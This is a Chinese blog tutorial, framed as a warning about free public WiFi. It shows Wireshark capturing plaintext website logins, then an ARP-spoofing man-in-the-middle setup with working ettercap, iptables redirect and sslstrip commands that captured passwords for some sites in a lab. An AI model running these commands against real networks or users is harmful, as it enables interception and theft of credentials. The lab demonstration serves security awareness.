温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

免费WiFi,wireshark抓包及sslstrip抓密码

发布时间:2020-05-27 17:26:50 来源:网络 阅读:4757 作者:hfzhoulin 栏目:安全技术

    因写了一段文字,就有这个抓包实验

--------------------------------

话说:“现在我们一到某处,第一件事便是问有没有WiFi”。WiFi成为当下的热门,在公共场合人们最喜欢免费WiFi。但用着用着后不觉QQ被盗了。这WiFi便是诱饵,钓鱼人设了一个局,我们以为捡到便宜了,须不知,我们上勾了。QQ被盗,邮箱被浏览等等。免费虽好,请谨慎。

---------------------------------------

1.利用wireshark抓包测试51cto帐户及密码

环境的搭建

网络环境:网关:192.168.199.1;

测试主机:192.168.199.101,ubuntu13.04/wireshark;

测试目标:51cto.com

步骤

 a.ubuntu 13.04安装wireshark

      sudo apt-get wireshark

  b. 新建wireshark组把普通用户加入其中,给wireshark使用权限

      sudo groupadd wireshark //加组wireshark

      sudo gpasswd -a zozlin wireshark //向组 GROUP 中添加用户 USER

      sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改组

      sudo chmod 4755 /usr/bin/dumpcap //可执行权限

      错误:免费WiFi,wireshark抓包及sslstrip抓密码

             解决方法:sudo gedit /usr/share/wireshark/init.lua

倒数第二行原来为:dofile(DATA_DIR.."console.lua")改为--dofile(DATA_DIR.."console.lua")

        

  c. sudo wireshark  选择网卡(在本机测试)

免费WiFi,wireshark抓包及sslstrip抓密码

定过滤规则

ip.src==192.168.199.100  && http   (源地址及http协议)

免费WiFi,wireshark抓包及sslstrip抓密码

重点 (post application/x-www-form-urllencoded)

先试试天涯论坛和163邮件的密码,ssl己加密传输了。后51cto 发现是明文帐号密码

免费WiFi,wireshark抓包及sslstrip抓密码

-----------------------------------------


2.利用sslstrip和ettercap突破ssl嗅探密码

环境的搭建

网络环境:网关:192.168.199.1;

***主机:192.168.199.101,ubuntu13.04/wireshark/sslstrip;

被***主机:192.168.199.105/103,虚拟机Windowsxp,IE6;

测试目标:51cto.com  mail.163.com  tianya.cn  baidu.com

步骤

下载 

http://www.thoughtcrime.org/software/sslstrip/


 解压

 tar -zxvf sslstrip-0.9.tar.gz


 安装

 sslstrip python setup.py install


打开ip_forword转发   

 echo “1”>/proc/sys/net/ipv4/ip_forward


使用Iptables过滤数据包   //通过iptables 把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

sslstrip -l 10000


利用ettercap进行arp欺骗

ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/


成果

免费WiFi,wireshark抓包及sslstrip抓密码

mail.163.com  51cto.com     破

baidu.com    密码再次加密了

tianya.cn   未破


参考1.http://www.freebuf.com/articles/web/5929.html

        2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html

      3.http://www.linuxde.net/2011/11/2522.html



向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI